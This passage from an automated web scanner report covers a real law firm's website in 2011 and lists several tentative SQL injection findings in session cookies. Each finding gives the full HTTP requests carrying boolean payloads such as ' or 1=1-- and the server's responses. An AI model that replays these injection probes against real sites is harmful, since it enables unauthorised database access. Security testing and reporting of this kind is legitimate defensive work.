Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953792255674%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 16:11:35 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953792255674%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.80. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 92347001%20or%201%3d1--%20 and 92347001%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898892347001%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 16:11:41 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898892347001%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.81. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 21326148'%20or%201%3d1--%20 and 21326148'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=21326148'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 16:12:00 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=21326148'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.82. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 15468633'%20or%201%3d1--%20 and 15468633'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=15468633'%20or%201%3d1--%20; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 16:12:06 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=15468633'%20or%201%3d2--%20; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.83. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCONNECTID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 69977606'%20or%201%3d1--%20 and 69977606'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=69977606'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 16:11:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=69977606'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...

1.84. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

